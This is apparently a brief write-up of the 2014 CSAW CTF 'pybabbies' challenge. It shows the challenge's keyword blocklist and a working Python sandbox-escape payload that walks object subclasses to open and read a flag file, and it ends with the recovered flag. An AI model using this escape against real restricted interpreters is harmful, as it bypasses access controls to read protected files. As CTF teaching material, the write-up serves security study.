2014 CSAW CTF Qual - Exploitation 200 - pybabbies

  1. given source code of Python sandbox pyshell.py, need to find key
  2. inspecting reveals all __builtins__ have been cleared, except raw_input and print; additionally "sys" being banned means "system" cannot be used as well; matches are case-insensitive
  3. if all these checks pass, then the input command string is exec'ed
  4. refactored the given pyshell.py file to facilitate local testing
    5. #!/usr/bin/env python
#-*- coding: utf-8 -*-

from __future__ import print_function

print("Welcome to my Python sandbox! Enter commands below!")
banned = ["import", "exec", "eval", "pickle", "os", "subprocess",
	"kevin sucks", "input", "banned", "cry sum more", "sys"]
targets = __builtins__.__dict__.keys()
targets.remove("raw_input")
targets.remove("print")
for x in targets: del __builtins__.__dict__[x]
stmts = [
"print({}.__class__.__bases__[0].__subclasses__()[40]('./flag.txt').read())"
]
for i, data in enumerate(stmts):
	for no in banned:
		if no.lower() in data.lower():
			print("offending term:",no)
			break
	else:
		print(i,":",data)
		exec data
  5. {}.__class__... could instead be ().__class__..., to access the base class of tuple instead of dict; index 40 is file;
    so the overall command is just reading the contents of a file
  6. guessed rightly that filename is flag.txt; otherwise would have tried key.txt
  7. flag{definitely_not_intro_python}